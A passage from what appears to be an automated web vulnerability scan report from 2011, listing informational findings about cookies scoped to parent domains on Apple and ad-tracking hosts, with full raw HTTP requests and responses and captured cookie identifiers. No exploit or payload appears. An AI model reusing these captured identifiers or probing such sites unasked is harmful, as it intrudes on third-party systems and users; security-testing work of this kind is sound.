Set-Cookie: ccl=uBJRarGVcixAAGSJWzd8d3vxOg/2vSQlRKgrn/RhMuw6NOSdGGc7KhKoy98rT4JxkLPJGcA3G9JVZAKGGUeg0rfqqiJYEIZH3tG4GNao0NE7SqYO5kHNKRZnb2vkIh1+qYDl2ifZGy0POZ8QUYLzaCgiyNlZL5VDv9NhNWAjp97Is3YF3y20l8guUegLMOCwy6y7HJkzOBGxL/wFIxpaDfsp6aWi54M6uHhC29rySJuwnL+BWcVS9xqn+jQhS7msFYsY6R18o5ZJvdSAXByGqbg5REtWpLPIc/PzKvQjdnFOwWp2VlAL0jSLM7hGj7OIeIhamPPUj0ngSnKdT4xp04otxwH1GY1IGzoRcshhLZQWrPkz1JsU7/uXu0Ed9ByhWoKIxYzGOjc2Ss00WUF3y8kbPP/lRbac1Y8eT9J6atlIuTt9+NMYlbNDfZm3kD6KaRdxmy6hzYkPx8geQioXgS601762LWOwcz+/LpnFHCVXRR2bOG+Hn/yrMTk2X42217IRhIBUtth/MeUn6F3SxLHf7nnWg02vBWP8Fq4jLMxGg1I5euN50ftaUZfEaj3A; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.26. http://images.apple.com/global/styles/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/styles/base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=KajDDzf8359RIllNsZwDVIn4PhDV2a/MovXkjKgPIrS/hlS53q1JEe6rc01cFrsDdvrbccTge9mICJtvoZSIMg2qwrFXIVIfLh83DVGUTVzE88u69+1qWUa0nsoV9ZBXI5VC1aYFMQoKN+re9dwttn3vAgAryoBer9Blq44l+etpRQe2iTZg4vfWg5coocOCVmgBetXruD2T5RxwRnvz3jCd3+78NTu5N8h75eTqhGInDJqrs12upYnx7R2AOfFDZ3MaD5/ZxBv/4g0YMW18kSHsbj3Wyy86hXmyt9nsiLAdQlxCbNOHx+4osjg8XCP89Ab/65LLAZiQBHCPKGyoMQvrJXqK2pndhdjTDh08xFDqxhqGk9IFY5rZ9mmUQhZL/djoMdk99Ai2w2OytbYFO5j+jEFERbJhmtOxA8XIhp6ntRgwBRDDb88kpxgwAIQA38MbeQIDt3TNd09PM7jZ9Zb6Iwqx9iaSqkwLP/nd/xxegQNdOZhzAOp5e5f54LOADbbvSAEePr5p0WDeJXJ7sbWl7Gsj/T4YqXwORulv161moKa4iW+ZwTFrJEUN8pac; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/styles/base.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "7d0c-4a28e6fd30a00"
If-Modified-Since: Thu, 05 May 2011 21:55:52 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Thu, 05 May 2011 21:55:52 GMT
ETag: "7d0c-4a28e6fd30a00"
Cache-Control: max-age=499
Expires: Tue, 12 Jul 2011 18:07:25 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=KajDDzf8359RIllNsZwDVIn4PhDV2a/MovXkjKgPIrS/hlS53q1JEe6rc01cFrsDdvrbccTge9mICJtvoZSIMg2qwrFXIVIfLh83DVGUTVzE88u69+1qWUa0nsoV9ZBXI5VC1aYFMQoKN+re9dwttn3vAgAryoBer9Blq44l+etpRQe2iTZg4vfWg5coocOCVmgBetXruD2T5RxwRnvz3jCd3+78NTu5N8h75eTqhGInDJqrs12upYnx7R2AOfFDZ3MaD5/ZxBv/4g0YMW18kSHsbj3Wyy86hXmyt9nsiLAdQlxCbNOHx+4osjg8XCP89Ab/65LLAZiQBHCPKGyoMQvrJXqK2pndhdjTDh08xFDqxhqGk9IFY5rZ9mmUQhZL/djoMdk99Ai2w2OytbYFO5j+jEFERbJhmtOxA8XIhp6ntRgwBRDDb88kpxgwAIQA38MbeQIDt3TNd09PM7jZ9Zb6Iwqx9iaSqkwLP/nd/xxegQNdOZhzAOp5e5f54LOADbbvSAEePr5p0WDeJXJ7sbWl7Gsj/T4YqXwORulv161moKa4iW+ZwTFrJEUN8pac; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.27. http://images.apple.com/global/styles/itunesmodule.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/styles/itunesmodule.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=hbVmdnpxNIgF+OiSJhok9CMWAzQhliHSQUaBAqwwAw1cUBvzE+pThCdfyIeFNPO0uBm2HVywloeii+ejfp56dywlCAv2HvSHu8ETLcRlTeGEuLnobqfKF+tYcs8BOzPt7KgfPldd4eJWTNOxhIChlCyJycuYGuo/aMTtUigvqr3S3p9d9ZklWvqGwj5f7h0rMCr0X5kwMhQF1pbWImeuCQUKtD/a4fxbAr5sqvEyYW9vUOgdrz9GHO7a9H5ot4fdHaE7v55cIT2P1g86itrgY8rb7nwTkVIE2aP0I3wXy3EpXgf7Pe8ge3nJNI4YbFyuM/kZzRqSatLfkKQvk0gtMRiYfeszzZfzGbaLDcZrHx05ZZ0/IyCT5BTCNP2AYe+qNk9IQM3u4EVOhQ6Vss5xwG3zF/lxxcV3JQY0Xj4jn1lj+jRiBRbjz1WjNIapP5Gffzzt6XK+55KPGo78F4IPWcJdKCF8+qErt/JjnHlWfTQBE0yiQw2LfK1kXBySN54ZRVdtarn3lxRLShUoa+ntmaWxQkNc92IG2NZZth4JzaYEWbsLjvThzDg9Sr7NDex/; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/styles/itunesmodule.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "d46-48f2ddda94180"
If-Modified-Since: Wed, 01 Sep 2010 07:44:22 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 01 Sep 2010 07:44:22 GMT
ETag: "d46-48f2ddda94180"
Cache-Control: max-age=506
Expires: Tue, 12 Jul 2011 18:07:32 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=hbVmdnpxNIgF+OiSJhok9CMWAzQhliHSQUaBAqwwAw1cUBvzE+pThCdfyIeFNPO0uBm2HVywloeii+ejfp56dywlCAv2HvSHu8ETLcRlTeGEuLnobqfKF+tYcs8BOzPt7KgfPldd4eJWTNOxhIChlCyJycuYGuo/aMTtUigvqr3S3p9d9ZklWvqGwj5f7h0rMCr0X5kwMhQF1pbWImeuCQUKtD/a4fxbAr5sqvEyYW9vUOgdrz9GHO7a9H5ot4fdHaE7v55cIT2P1g86itrgY8rb7nwTkVIE2aP0I3wXy3EpXgf7Pe8ge3nJNI4YbFyuM/kZzRqSatLfkKQvk0gtMRiYfeszzZfzGbaLDcZrHx05ZZ0/IyCT5BTCNP2AYe+qNk9IQM3u4EVOhQ6Vss5xwG3zF/lxxcV3JQY0Xj4jn1lj+jRiBRbjz1WjNIapP5Gffzzt6XK+55KPGo78F4IPWcJdKCF8+qErt/JjnHlWfTQBE0yiQw2LfK1kXBySN54ZRVdtarn3lxRLShUoa+ntmaWxQkNc92IG2NZZth4JzaYEWbsLjvThzDg9Sr7NDex/; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.28. http://images.apple.com/itunes/home/styles/home.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/itunes/home/styles/home.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=1FciQd7giiJFEgv4vVPtMCBm7MZFgP3pI/vKQFStWClpRPhHQ3zP3nifi6OoK7SJm2x8HuCaAZ0okoSGVfzga0qB+Yj/bOcikQ4AhQPJ2J9zYOJu8IlZkWZf5AOzCPtxm33ikuaRS52LsB2FYvoSdBdbx9M53ArvvI4ElGA2adH+6bhRVxCRalHv2m0y3p+0yBuW5NB9xNj7uDFQhY+GWBCl8WtASWNuA3Rz8Q5J+ucOFGHueE7DC+Kka0HSvZ0uhTmjNtru2ipqpkoKe4kTNSyeoI/hT4HgUMiUzszj0f0J7fm4K2wp3h7NHocDwWbooSP/RMUOkiLNwaYD+3Ed+3JYffJC9wt3JNLtCSI3BEIqS8c3L5WKXc3/sHFN3A+qpiIGFCS0dOwXNofTCtSVi9mz2BtrPek+4uHVXMFWNrxir5yGDH2GG/p9aLl5uDHiPAzTXvR2c957Yq6MKYQm9hBiD+5/qGaJcz9SC3ShTTM5oxp2A46dVTVnaO9vqJYb2G5nEMOBaTiIOETdHfzDXMUQmGYLD6SzeZOPV9zbf7zIe9WDPN2D/Mpqw3CWYAvm; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /itunes/home/styles/home.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "8aa-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Jun 2011 23:20:56 GMT
ETag: "90f-4a6f62728e600"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
X-Cached-Time: Fri, 01 Jul 2011 00:29:49 GMT
Cteonnt-Length: 2319
Content-Type: text/css
Content-Length: 2319
Cache-Control: max-age=339
Expires: Tue, 12 Jul 2011 18:04:45 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Set-Cookie: ccl=1FciQd7giiJFEgv4vVPtMCBm7MZFgP3pI/vKQFStWClpRPhHQ3zP3nifi6OoK7SJm2x8HuCaAZ0okoSGVfzga0qB+Yj/bOcikQ4AhQPJ2J9zYOJu8IlZkWZf5AOzCPtxm33ikuaRS52LsB2FYvoSdBdbx9M53ArvvI4ElGA2adH+6bhRVxCRalHv2m0y3p+0yBuW5NB9xNj7uDFQhY+GWBCl8WtASWNuA3Rz8Q5J+ucOFGHueE7DC+Kka0HSvZ0uhTmjNtru2ipqpkoKe4kTNSyeoI/hT4HgUMiUzszj0f0J7fm4K2wp3h7NHocDwWbooSP/RMUOkiLNwaYD+3Ed+3JYffJC9wt3JNLtCSI3BEIqS8c3L5WKXc3/sHFN3A+qpiIGFCS0dOwXNofTCtSVi9mz2BtrPek+4uHVXMFWNrxir5yGDH2GG/p9aLl5uDHiPAzTXvR2c957Yq6MKYQm9hBiD+5/qGaJcz9SC3ShTTM5oxp2A46dVTVnaO9vqJYb2G5nEMOBaTiIOETdHfzDXMUQmGYLD6SzeZOPV9zbf7zIe9WDPN2D/Mpqw3CWYAvm; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

/* heros */
#main .hero { padding-top:76px; padding-bottom:33px; *padding-bottom: 0; border-color: #E5E5E5 #DBDBDB #D2D2D2; background:#fafafa; background:-webkit-gradient(linear, 0 0, 0 100%, from(#f
...[SNIP]...

10.29. http://images.apple.com/itunes/styles/itunes.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/itunes/styles/itunes.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=kzcWN2xwscEDNLz4LsP8A+1esMW2xKyzkKKkvArVL9MstmsliwY6LtcUQ3+29SOj+20afrvi4F5iKw/pRCu+HDWWGKPctI/ZQnGjnSwmJQ6L1VqEpU12SUCNObJzJJLe4uzOp8j6a+aF4qCE5Mmrh8XSgj7vvA8MfK4iT9IdBew5EIHB9jCco1VJeZ5pX7zuKpS7f0jfXkS7JRPOYu4j6szcVOcRtYi8cdjtPOYLYpZHSc1EffdIN+EXBJ3S9P/gR9wiSvV+X+weNLfAmP9o5ycM0nkrZNbOyzdJa1BzWen5EDDKQg7jSYECbCA8iHr1qtpYOaxaC/Pjel+7EilWxxIWZC0xow8g/3XvePxjCV4lE+xMUtBoM+bCivcDfXDPVPvNcumNNe0ZBhqd2BRk3kT3G0kO5YR5xQ6yzXiZ9vYY1Wx3JEi/4F7hVbGI2tF9OXzFGHn7zXRPA+PdEAqxM8YDEE7Y6UmiC5iwqzsDfpvNU2VW5m4hoquq/jm8RUVhGbZOCs3ap30jHF7PHlHSH/3yqLPvNlcOq7bCQWMFpXdVZixeGx2YPt987Q3XgL9H; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /itunes/styles/itunes.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "1c2a-4a4fc3ffb72c0"
If-Modified-Since: Sun, 05 Jun 2011 19:46:59 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Sun, 05 Jun 2011 19:46:59 GMT
ETag: "1c2a-4a4fc3ffb72c0"
Cache-Control: max-age=466
Expires: Tue, 12 Jul 2011 18:06:52 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=kzcWN2xwscEDNLz4LsP8A+1esMW2xKyzkKKkvArVL9MstmsliwY6LtcUQ3+29SOj+20afrvi4F5iKw/pRCu+HDWWGKPctI/ZQnGjnSwmJQ6L1VqEpU12SUCNObJzJJLe4uzOp8j6a+aF4qCE5Mmrh8XSgj7vvA8MfK4iT9IdBew5EIHB9jCco1VJeZ5pX7zuKpS7f0jfXkS7JRPOYu4j6szcVOcRtYi8cdjtPOYLYpZHSc1EffdIN+EXBJ3S9P/gR9wiSvV+X+weNLfAmP9o5ycM0nkrZNbOyzdJa1BzWen5EDDKQg7jSYECbCA8iHr1qtpYOaxaC/Pjel+7EilWxxIWZC0xow8g/3XvePxjCV4lE+xMUtBoM+bCivcDfXDPVPvNcumNNe0ZBhqd2BRk3kT3G0kO5YR5xQ6yzXiZ9vYY1Wx3JEi/4F7hVbGI2tF9OXzFGHn7zXRPA+PdEAqxM8YDEE7Y6UmiC5iwqzsDfpvNU2VW5m4hoquq/jm8RUVhGbZOCs3ap30jHF7PHlHSH/3yqLPvNlcOq7bCQWMFpXdVZixeGx2YPt987Q3XgL9H; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.30. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=YELHOFJwAob0FYVsKawubaYstKfAC0nRKIpwIg02FUBCdbdBVgwihXQFIQbmGUBCsGeBVgAQvaQFIQW4FUBCLppBVgQBaaQFIgZ4FUBCAGeBVgQ3gZQFIgJaGUBCcbpBVgAxBaQFIMqsGUBCBHoBVggWaaQFIYnXGUBC1mpBVgQUXaQFI4xlGUBCEdpBVgQwZaQFIcxvGUBCY8rBVgQjWaQFIYxvGUBCKopBVgQRgaQFI0soGUBCZTeBVEZAfZOiGVUj0Xw+NX8BzGmAPSqBJQqHBUbNGvBsDGAzPaQH3KdAsyrRdQb+BMzrG5hreQAL/ZUSGerJrAahe3qyIcydGAH; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
GUID=MTMxMDUwMzE5MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=pacsunwear_cs=1&betq=11722=423719nc=1310503191? HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=NWwGOFJwAob0FEbsKewubaIDtKfAC0nRlJpwIg02FAHCdbdBwhwihXAcIQbmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhQBaaAcIgZ4FAHCAGeBwhQ3gZAcIgJaGAHCcbpBwhAxBaAcIMqsGAHCBHoBwhgWaaAcIYnXGAHC1mpBwhQUXaAcI4xlGAHCEdpBwhQwZaAcIcxvGAHCY8rBwhQjWaAcIYxvGAHCKopBwhQRgaAcI0soGAHCZTeBwFZAfZOiGBaj0Xw+NXsYzGmAPSqBkRqHBUbNGbHsDGAzPaAe3KdAsyrR4Rb+BMzrGlnreQAL/ZEpGe7JrAah5A; GUID=MTMxMDM5Mzc0MTsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 12 Jul 2011 20:39:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=YELHOFJwAob0FYVsKawubaYstKfAC0nRKIpwIg02FUBCdbdBVgwihXQFIQbmGUBCsGeBVgAQvaQFIQW4FUBCLppBVgQBaaQFIgZ4FUBCAGeBVgQ3gZQFIgJaGUBCcbpBVgAxBaQFIMqsGUBCBHoBVggWaaQFIYnXGUBC1mpBVgQUXaQFI4xlGUBCEdpBVgQwZaQFIcxvGUBCY8rBVgQjWaQFIYxvGUBCKopBVgQRgaQFI0soGUBCZTeBVEZAfZOiGVUj0Xw+NX8BzGmAPSqBJQqHBUbNGvBsDGAzPaQH3KdAsyrRdQb+BMzrG5hreQAL/ZUSGerJrAahe3qyIcydGAH; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
Set-Cookie: GUID=MTMxMDUwMzE5MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 12 Jul 2011 21:39:52 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.31. http://pixel.mathtag.com/data/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/data/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1310503211; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:11 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/img?mt_id=100036&mt_dcid=1310503209 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1310488542; mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3d 6973
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 12 Jul 2011 20:40:11 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1310503211; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:11 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.32. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EOIAFPaeApll_6ixz4EBrAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8Rw9pLsQ; expires=Mon, 10-Oct-2011 20:39:25 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=776749753;fpan=0;fpa=P0-1840915809-1310503155904;ns=0;url=http%3A%2F%2Fwww.popcap.com%2Fallgames.php;ref=http%3A%2F%2Fwww.popcap.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1310503165109;tzo=300;a=p-9admVzrPiptk2;labels=Web.Casual HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFgAFPaeApll_6ixz4EBqAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8fpPc

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/8171//99D2/
Set-Cookie: d=EOIAFPaeApll_6ixz4EBrAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8Rw9pLsQ; expires=Mon, 10-Oct-2011 20:39:25 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Tue, 12 Jul 2011 20:39:25 GMT
Server: QS

10.33. http://pixel.rubiconproject.com/d.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/d.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

